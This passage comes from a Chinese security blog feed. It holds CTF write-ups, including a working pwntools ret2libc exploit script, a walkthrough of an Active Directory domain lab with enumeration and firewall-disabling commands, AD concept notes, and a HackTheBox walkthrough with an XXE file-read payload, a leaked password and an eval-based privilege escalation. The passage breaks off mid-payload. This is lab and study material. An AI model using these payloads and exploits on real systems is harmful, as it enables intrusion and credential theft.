invoke__">strlen</span>(<span class="hljs-string">'http://'</span>), <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-string">'google.cn'</span>)) === <span class="hljs-string">'google.cn'</span>){<br> <span class="hljs-keyword">die</span>(<span class="hljs-string">'Hey, 老哥, 你会绕过吗!'</span>);<br> }<br> <span class="hljs-keyword">if</span>(<br> <span class="hljs-variable">$url</span>[<span class="hljs-string">'host'</span>] === <span class="hljs-string">'google.cn'</span><br> ){<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"flag{"</span>.<span class="hljs-variable">$flag</span>.<span class="hljs-string">"}"</span>;<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">die</span>(<span class="hljs-string">'老哥!!!'</span>);<br> }<br>}<br><span class="hljs-meta">?></span> <br></code></pre></td></tr></table></figure><p>没啥难度,直接用@格式绕过就行</p><p><strong>payload</strong></p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">47.101</span>.<span class="hljs-number">38.214</span>:<span class="hljs-number">50002</span><span class="hljs-regexp">/yfhgyrt.php?url=http:/</span><span class="hljs-regexp">/My0n9s@google.cn/</span><br></code></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/10/25/3jEZJtPTySzwvQg.png" alt="3.png"></p><h3 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h3><h4 id="s-apk"><a href="#s-apk" class="headerlink" title="s.apk"></a>s.apk</h4><p>APK的题目,直接先拖进jeb里面静态分析一下,主逻辑在MainActivity里面,反编译看一下</p><p><img src="https://i.loli.net/2021/10/25/YBjlhc8D5oEW4CJ.png" alt="image.png"></p><p>直接一个checkSN函数,第一个参数是”Tenshine”,第二个参数是输入的内容</p><p>再看看这个函数的内容</p><p><img src="https://i.loli.net/2021/10/25/MqEsDh9cGZRCNyQ.png" alt="image.png"></p><p>逻辑也很简单,就是<code>MD5(参数1)</code>结果的偶数位拼接,加上<code>flag{}</code>包裹后和<code>参数2</code>对比,相当即正确</p><p><strong>exp</strong></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python">tmp2 = <span class="hljs-string">'b9c77224ff234f27ac6badf83b855c76'</span> <span class="hljs-comment"># md5("Tenshine")</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(tmp2)):<br> <span class="hljs-keyword">if</span> i % <span class="hljs-number">2</span> ==<span class="hljs-number">0</span>:<br> <span class="hljs-built_in">print</span>(tmp2[i],end=<span class="hljs-string">''</span>)<br><span class="hljs-comment"># flag{bc72f242a6af3857}</span><br></code></pre></td></tr></table></figure><h4 id="爱生活dota"><a href="#爱生活dota" class="headerlink" title="爱生活dota"></a>爱生活dota</h4><p>32位,无壳,拖进IDA看</p><p>逻辑就在主函数,很简单,贴一下简单的分析</p><p><img src="https://i.loli.net/2021/10/25/aMyCUbQKp72hBTr.png" alt="image.png"></p><p>就是一个用户名和密码,用户名直接给了是<code>StarsWarss</code>,密码有个简单的异或,反推即可</p><p><strong>exp</strong></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python">text = [<span class="hljs-number">0x76</span>, <span class="hljs-number">0x2A</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0x58</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0x2B</span>, <span class="hljs-number">0x38</span>, <span class="hljs-number">0x76</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x44</span>,<br> <span class="hljs-number">0x79</span>]<br><br>tmp = <span class="hljs-string">'WuSheng2009'</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(text)):<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(text[i] ^ <span class="hljs-built_in">ord</span>(tmp[i])), end=<span class="hljs-string">''</span>)<br><span class="hljs-comment"># 拼接一下</span><br><span class="hljs-comment"># KEY{StarsWarss!_L0VE_Dot@}</span><br></code></pre></td></tr></table></figure><h3 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h3><h4 id="math"><a href="#math" class="headerlink" title="math"></a>math</h4><p>就是个栈溢出,但是输入size那里有个abs32取绝对值再取余,在储存有符号数的时候,补码的范围决定了最小的负数(-0x80000000)取绝对值后的结果无法表示,所以此时取绝对值后的结果还是(-0x80000000),然后就可以读入0xe0的内容,接着,puts泄露libc,打onegadget</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> * <br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>context(os=<span class="hljs-string">'linux'</span>,arch=<span class="hljs-string">'amd64'</span>,log_level=<span class="hljs-string">'debug'</span>)<br><br>p = remote(<span class="hljs-string">"47.100.117.2"</span>,<span class="hljs-number">10005</span>)<br><span class="hljs-comment">#p = process("./math")</span><br>elf = ELF(<span class="hljs-string">"./math"</span>)<br>libc = ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc-2.27.so"</span>)<br>puts_plt = elf.plt[<span class="hljs-string">"puts"</span>]<br>puts_got = elf.got[<span class="hljs-string">"puts"</span>]<br>pop_rdi = <span class="hljs-number">0x400813</span> <span class="hljs-comment">#pop rdi;ret</span><br>main = <span class="hljs-number">0x40075b</span><br>ret = <span class="hljs-number">0x400566</span><br><br><br>p.sendlineafter(<span class="hljs-string">"size\n"</span>,<span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(-<span class="hljs-number">0x80000000</span>)))<br><span class="hljs-comment">#gdb.attach(p)</span><br>payload = <span class="hljs-string">'a'</span>*(<span class="hljs-number">0x40</span>)+ <span class="hljs-string">'b'</span>*<span class="hljs-number">0x8</span>+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)<br>p.send(payload)<br>p.recvuntil(<span class="hljs-string">'\n'</span>)<br>puts_addr = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>))<br>log.info(<span class="hljs-string">"puts_addr="</span>+<span class="hljs-built_in">hex</span>(puts_addr))<br><br>libc_base = puts_addr-libc.sym[<span class="hljs-string">"puts"</span>]<br>log.info(<span class="hljs-string">"libc_base="</span>+<span class="hljs-built_in">hex</span>(libc_base))<br>ogg = libc_base+<span class="hljs-number">0x4f432</span><br><br>p.sendlineafter(<span class="hljs-string">"size\n"</span>,<span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(-<span class="hljs-number">0x80000000</span>)))<br><br>payload1 = <span class="hljs-string">'a'</span>*(<span class="hljs-number">0x40</span>)+ <span class="hljs-string">'b'</span>*<span class="hljs-number">0x8</span>+p64(ret)+p64(ogg)<br>p.send(payload1)<br>p.interactive()<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>内网渗透(二)--搭建域</title>
<link href="/2021/11/26/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-%E6%90%AD%E5%BB%BA%E5%9F%9F/"/>
<url>/2021/11/26/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-%E6%90%AD%E5%BB%BA%E5%9F%9F/</url>
<content type="html"><![CDATA[<p>由于本人是初学者,所以在这里我们只讨论如何在虚拟机上搭建单个域。</p><h2 id="准备"><a href="#准备" class="headerlink" title="准备"></a>准备</h2><p>首先,我们要准备三个镜像文件,一个是Windows Server 2008 R2(64位),作为域控;另外两个分别是Windows 7(64位)和Windows Server 2003(64位),作为域成员。具体安装方法不再赘述。</p><p>为了模拟一个不与因特网连通的局域网环境,我们把三台虚拟机的网络适配器均设置为“仅主机模式”。再检查机器之前是否能ping通,为此我们要先关闭防火墙。</p><p>因为我们把Windows Server 2008作为域控,所以先<code>ipconfig</code>查看其ip地址,再把另外两台域成员的dns服务器设置为域控的ip。如果能互相ping通,则网络设置无误。</p><h2 id="搭建域控"><a href="#搭建域控" class="headerlink" title="搭建域控"></a>搭建域控</h2><p>先设置server2008。首先给server的管理员账户设置密码。</p><p>然后点击左下角的服务器管理器图标,然后点击 角色→添加角色,服务器角色选择为Active Directory域服务,按照顺序点击下一步完成角色设置。</p><p>设置完角色之后重新进入服务器管理器,依次点击 Active Directory域服务→运行Active Directory域服务安装向导。</p><p>在向导中点击“下一步”,“在新林中新建域”,填写一个域名,选择windows server 2008 r2,输入Administrator的密码。</p><p>接着server 2008将重启,重启后将server 2003的DNS设置为server 2008的静态IP。</p><p>最后将win7和server 2003加入该域中。右键计算机→属性→系统属性→更改,然后填写域,点击确定。</p><p><strong>转载自:</strong><a href="https://blog.csdn.net/weixin_36711901/article/details/102995640">VMware中用虚拟机模拟搭建域(步骤、讲解详实,并以浅显的方式讲解了VMware中的三种网络模式、IP配置),Windows Server 2008 R2为域控服务器,Win7为域成员服务器_胖胖的飞象的博客-CSDN博客_虚拟机怎么创建域</a></p><h2 id="相关命令"><a href="#相关命令" class="headerlink" title="相关命令"></a>相关命令</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs powershell">查询域用户 net user /domain<br>查询域管理员用户 net <span class="hljs-built_in">group</span> <span class="hljs-string">"domain admins"</span> /domain<br>查询域里面的工作组 net <span class="hljs-built_in">group</span> /domain<br>查询域名称 net view /domain<br>查询域内计算机 net view /domain:XX<br>查询域内时间服务器 net time /domain<br>查看域控 net <span class="hljs-built_in">group</span> <span class="hljs-string">"Domain controllers"</span><br>查询所有域控制器 dsquery server<br>查询登录本机的域管理员 net localgroup administrators /domain<br>将域用户添加到本机 net localgroup administrators workgroup\user001 /add<br>关闭防火墙 netsh advfirewall <span class="hljs-built_in">set</span> allprofiles state off<br></code></pre></td></tr></table></figure><p>当然,如果只有单个域时,寻找域控并没有这么复杂。我们可以先<code>systeminfo</code>查找出当前域的名字,再ping一下域的名字。在每一台计算机上运行<code>ipconfig</code>,把得到的ip和前面ping出来的ip比较,如果有一样的,则该机器是域控。</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>内网渗透</tag>
</tags>
</entry>
<entry>
<title>内网渗透(一)--相关概念</title>
<link href="/2021/11/19/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-%E7%9B%B8%E5%85%B3%E6%A6%82%E5%BF%B5/"/>
<url>/2021/11/19/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-%E7%9B%B8%E5%85%B3%E6%A6%82%E5%BF%B5/</url>
<content type="html"><![CDATA[<h2 id="工作组"><a href="#工作组" class="headerlink" title="工作组"></a>工作组</h2><p><strong>工作组</strong>(Work Group) 是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,以方便管理。</p><p>比如在一个网络内,可能有成百上千台工作电脑,如果这些电脑不进行分组,都列在“网上邻居”内,可想而知会有多么乱。</p><p>为了解决这一问题,Windows 9x/NT/2000 引用了“工作组”这个概念,比如一所高校,会分为诸如数学系、中文系之类的,然后数学系的电脑全都列入数学系的工作组中,中文系的电脑全部都列入到中文系的工作组中……如果你要访问某个系别的资源,就在“网上邻居”里找到那个系的工作组名,双击就可以看到那个系别的电脑了。</p><p>在工作组中所有的计算机都是平等的,没有管理与被管理之分,因此工作组网络也称为对等网络。</p><p>所以对于管理者而言,工作组的管理方式有时会不太便于管理,这时候就需要了解域的概念了。</p><h2 id="域"><a href="#域" class="headerlink" title="域"></a>域</h2><h3 id="域-Domain"><a href="#域-Domain" class="headerlink" title="域 (Domain)"></a>域 (Domain)</h3><p>可以简单的理解成工作组的升级版,如果说工作组是“免费旅店”那么域就是“星级宾馆”;工作组可以随便进进出出,而域则有严格的控制。</p><p>在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为域控制器。</p><h3 id="域控制器-Domain-Controller"><a href="#域控制器-Domain-Controller" class="headerlink" title="域控制器 (Domain Controller)"></a>域控制器 (Domain Controller)</h3><p>简写为 <code>DC</code>,域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。</p><p>当电脑连入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确的,那么域控制器就会拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,这样就在一定程度上保护了网络上的资源。</p><p>正是因为域控起到了一个身份验证的作用,因此站在渗透的角度来说,拿下域控是至关重要的。拿下了域控,就相当于拿到了整个域内所有计算机的账号和密码。</p><p>而要想实现域环境,就必须要计算机中安装活动目录,也可以说如果在内网中的一台计算机上安装了活动目录,那它就变成了域控制器。在域中除了域控制器还有成员服务器、客户机、独立服务器。</p><h3 id="父域和子域"><a href="#父域和子域" class="headerlink" title="父域和子域"></a>父域和子域</h3><p>顾名思义,在一个域下新建了一个域便称其为子域。形象的来说,一个部门一个域,那个如果这个部门还有分部,那每个分部就可被称为子域,这个大的部门便称为父域。每个域中都有独立的安全策略。</p><h3 id="域树"><a href="#域树" class="headerlink" title="域树"></a>域树</h3><p>域树由多个域组成,这些域共享同一表结构和配置,形成一个连续的名字空间。</p><p>树中的域通过信任关系连接起来,活动目录包含一个或多个域树。域树中的域层次越深级别越低,一个“.”代表一个层次,如域child.Microsoft.com 就比 Microsoft.com这个域级别低,因为它有两个层次关系,而Microsoft.com只有一个层次。</p><p>而域Grandchild.Child.Microsoft.com又比 Child.Microsoft.com级别低,道理一样。他们都属于同一个域树。Child.Microsoft.com就属于Microsoft.com的子域。</p><p>多个域树可以组成一个域林。</p><h3 id="域林"><a href="#域林" class="headerlink" title="域林"></a>域林</h3><p>域林是指由一个或多个没有形成连续名字空间的域树组成,它与域树最明显的区别就在于域林之间没有形成连续的名字空间,而域树则是由一些具有连续名字空间的域组成。</p><p>但域林中的所有域树仍共享同一个表结构、配置和全局目录。域林中的所有域树通过Kerberos 信任关系建立起来,所以每个域树都知道Kerberos信任关系,不同域树可以交叉引用其他域树中的对象。域林都有根域,域林的根域是域林中创建的第一个域,域林中所有域树的根域与域林的根域建立可传递的信任关系.</p><p>比如benet.com.cn,则可以创建同属与一个林的accp.com.cn,他们就在同一个域林里.</p><p>当创建第一个域控制器的时候,就创建了第一个域(也称林根域),和第一个林。</p><p>林,是一个或多个共享公共架构和全局编录的域组成,每个域都有单独的安全策略,和与其他域的信任关系。一个单位可以有多个林。</p><h2 id="活动目录"><a href="#活动目录" class="headerlink" title="活动目录"></a>活动目录</h2><p><strong>活动目录</strong> <code>Active Directory</code> ,简写为 <code>AD</code>,它是 Windows Server 中负责架构中大型网络环境的集中式目录管理服务,在Windows 2000 Server 开始内置于 Windows Server 产品中。</p><p>目录包含了有关各种对象,例如用户、用户组、计算机、域、组织单位(OU)以及安全策略的信息。目录存储在域控上,并且可以被网络应用程序或者服务所访问。</p><p>活动目录就相当于内网中各种资源的一个目录,通过活动目录用户可以快速定位到这些资源的位置。</p><h2 id="DMZ"><a href="#DMZ" class="headerlink" title="DMZ"></a>DMZ</h2><p>DMZ (demilitarized zone),中文名为“隔离区”,或称“非军事化区”。它是为了解决安装防火墙后外部网络的访问用户不能访问内部网络服务器的问题,从而设立的一个非安全系统与安全系统之间的缓冲区。</p><p>DMZ 区可以理解为一个不同于外网或内网的特殊网络区域,DMZ 内通常放置一些不含机密信息的公用服务器,比如 WEB 服务器、E-Mail 服务器、FTP 服务器等。这样来自外网的访问者只可以访问 DMZ 中的服务,但不可能接触到存放在内网中的信息等,即使 DMZ 中服务器受到破坏,也不会对内网中的信息造成影响。</p><h2 id="域内的各种权限"><a href="#域内的各种权限" class="headerlink" title="域内的各种权限"></a>域内的各种权限</h2><p>首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:域本地组、全局组、通用组。</p><p><strong>域本地组</strong></p><p>成员范围:所有的域;使用范围:自己所在的域</p><p><strong>全局组</strong></p><p>成员范围:自己所在的域;使用范围:所有的域</p><p><strong>通用组</strong></p><p>成员范围:所有的域;使用范围:所有的域</p><p><strong>A-G-DL-P 策略</strong></p><p>A-G-DL-P 策略是将用户账号添加到全局组中,将全局组添加到域本地组中,然后为域本地组分配资源权限。</p><ul><li>A 表示用户账号</li><li>G 表示全局组</li><li>U 表示通用组</li><li>DL 表示域本地组</li><li>P 表示资源权限</li></ul>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>内网渗透</tag>
</tags>
</entry>
<entry>
<title>HackTheBox--BountyHunter</title>
<link href="/2021/11/19/HackTheBox-BountyHunter/"/>
<url>/2021/11/19/HackTheBox-BountyHunter/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这是本人Hack The Box学习笔记的第二篇,由于官方没有提供writeup,所以本人花了较长时间才通关。虽然官方表示难度为“简单”,但无奈本人实在是菜,python代码读不太懂,所以提权时折腾了好半天,才拿到root权限的flag。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>老规矩,nmap先扫一波:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -Pn -A -T4 10.10.11.100<br></code></pre></td></tr></table></figure><p>发现开放了ssh和web服务。先用浏览器访问web服务,页面中的“can use burp”(图片中的红框部分)引起了我的注意。</p><p><img src="https://i.loli.net/2021/11/19/lEcrsvoS6pYNzuj.png" alt="1.png"></p><h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><p>点击“portal”选项,看到一个表单页面,根据前面的暗示填写表单并用burpsuite抓包:</p><p><img src="https://i.loli.net/2021/11/19/CjwK8zlXES5tmsN.png" alt="2.png"></p><p>发现上传的数据被URL编码+base64编码了,发送到decoder里面解密一下,得到以下XML代码:</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta"><?xml version=<span class="hljs-string">"1.0"</span> encoding=<span class="hljs-string">"ISO-8859-1"</span>?></span><br><span class="hljs-tag"><<span class="hljs-name">bugreport</span>></span><br><span class="hljs-tag"><<span class="hljs-name">title</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">title</span>></span><br><span class="hljs-tag"><<span class="hljs-name">cwe</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cwe</span>></span><br><span class="hljs-tag"><<span class="hljs-name">cvss</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cvss</span>></span><br><span class="hljs-tag"><<span class="hljs-name">reward</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">reward</span>></span><br><span class="hljs-tag"></<span class="hljs-name">bugreport</span>></span><br></code></pre></td></tr></table></figure><p>XML版本为1.0,猜想可能存在XXE实体注入漏洞。</p><p>用<code>gobuster</code>爆破一下后台:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gobuster <span class="hljs-built_in">dir</span> -u http://10.10.11.100/ -w /usr/share/wordlists/dirb/common.txt -x php<br></code></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/11/19/TWLR5eoiAMXrGPp.png"></p><p>发现存在数据库信息泄露,但是直接访问<code>db.php</code>是空白页。于是尝试利用XXE漏洞配合PHP伪协议访问。上网搜索后构造如下payload:</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta"><?xml version=<span class="hljs-string">"1.0"</span> encoding=<span class="hljs-string">"ISO-8859-1"</span>?></span><br><span class="hljs-meta"><!DOCTYPE <span class="hljs-keyword">data</span> [</span><br><span class="hljs-meta"><span class="hljs-meta"><!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">"php://filter/convert.base64-encode/resource=db.php"</span>></span></span><br><span class="hljs-meta">]></span><br> <span class="hljs-tag"><<span class="hljs-name">bugreport</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">title</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">title</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">cwe</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cwe</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">cvss</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cvss</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">reward</span>></span><span class="hljs-symbol">&file;</span><span class="hljs-tag"></<span class="hljs-name">reward</span>></span><br> <span class="hljs-tag"></<span class="hljs-name">bugreport</span>></span><br></code></pre></td></tr></table></figure><p>这里注意要把上面的payload进行base64编码+URL编码后,再发包获得返回内容,返回内容解码后:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-comment">// TODO -> Implement login system with the database.</span><br><span class="hljs-variable">$dbserver</span> = <span class="hljs-string">"localhost"</span>;<br><span class="hljs-variable">$dbname</span> = <span class="hljs-string">"bounty"</span>;<br><span class="hljs-variable">$dbusername</span> = <span class="hljs-string">"admin"</span>;<br><span class="hljs-variable">$dbpassword</span> = <span class="hljs-string">"m19RoAU0hP41A1sTsq6K"</span>;<br><span class="hljs-variable">$testuser</span> = <span class="hljs-string">"test"</span>;<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>尝试使用admin作为用户名ssh连接,发现连接失败,这时我们想到可能存在其它用户,于是同样使用XXE漏洞查看<code>/etc/passwd</code>文件,发现还有一个development用户。使用development用户和上述密码后连接成功,获得第一个flag。</p><p><img src="https://i.loli.net/2021/11/19/Azoe89mCXZ45F7Q.png"></p><p><img src="https://i.loli.net/2021/11/19/pJPEQvhzKcYF2uR.png"></p><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>尝试<code>sudo su root</code>切换root用户,失败,只能<code>sudo -l</code>查看用户特权:</p><p><img src="https://i.loli.net/2021/11/19/4sV9e3ZRlEtABHr.png"></p><p>果然有了发现,打开这个python文件看看:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#Skytrain Inc Ticket Validation System 0.1</span><br><span class="hljs-comment">#Do not distribute this file.</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">load_file</span>(<span class="hljs-params">loc</span>):<br> <span class="hljs-keyword">if</span> loc.endswith(<span class="hljs-string">".md"</span>):<br> <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(loc, <span class="hljs-string">'r'</span>)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Wrong file type."</span>)<br> exit()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">evaluate</span>(<span class="hljs-params">ticketFile</span>):<br> <span class="hljs-comment">#Evaluates a ticket to check for ireggularities.</span><br> code_line = <span class="hljs-literal">None</span><br> <span class="hljs-keyword">for</span> i,x <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(ticketFile.readlines()):<br> <span class="hljs-keyword">if</span> i == <span class="hljs-number">0</span>:<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> x.startswith(<span class="hljs-string">"# Skytrain Inc"</span>):<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br> <span class="hljs-keyword">continue</span><br> <span class="hljs-keyword">if</span> i == <span class="hljs-number">1</span>:<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> x.startswith(<span class="hljs-string">"## Ticket to "</span>):<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Destination: <span class="hljs-subst">{<span class="hljs-string">' '</span>.join(x.strip().split(<span class="hljs-string">' '</span>)[<span class="hljs-number">3</span>:])}</span>"</span>)<br> <span class="hljs-keyword">continue</span><br><br> <span class="hljs-keyword">if</span> x.startswith(<span class="hljs-string">"__Ticket Code:__"</span>):<br> code_line = i+<span class="hljs-number">1</span><br> <span class="hljs-keyword">continue</span><br><br> <span class="hljs-keyword">if</span> code_line <span class="hljs-keyword">and</span> i == code_line:<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> x.startswith(<span class="hljs-string">"**"</span>):<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br> ticketCode = x.replace(<span class="hljs-string">"**"</span>, <span class="hljs-string">""</span>).split(<span class="hljs-string">"+"</span>)[<span class="hljs-number">0</span>]<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">int</span>(ticketCode) % <span class="hljs-number">7</span> == <span class="hljs-number">4</span>:<br> validationNumber = <span class="hljs-built_in">eval</span>(x.replace(<span class="hljs-string">"**"</span>, <span class="hljs-string">""</span>))<br> <span class="hljs-keyword">if</span> validationNumber > <span class="hljs-number">100</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br> fileName = <span class="hljs-built_in">input</span>(<span class="hljs-string">"Please enter the path to the ticket file.\n"</span>)<br> ticket = load_file(fileName)<br> <span class="hljs-comment">#DEBUG print(ticket)</span><br> result = evaluate(ticket)<br> <span class="hljs-keyword">if</span> (result):<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Valid ticket."</span>)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Invalid ticket."</span>)<br> ticket.close<br><br>main()<br></code></pre></td></tr></table></figure><p>审计后可知,我们需要输入一个Markdown文件,而且文件内容开头要是<code>__Ticket Code:__</code>,满足这个条件后继续向下执行。再往下发现可以执行系统命令的eval函数,所以要想办法执行eval函数那一块的代码。因为ticketcode要除以7后余数为4,且开头需要是<code>**</code>,以加号截断,所以构造如下payload并写入一个Markdown文件:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs 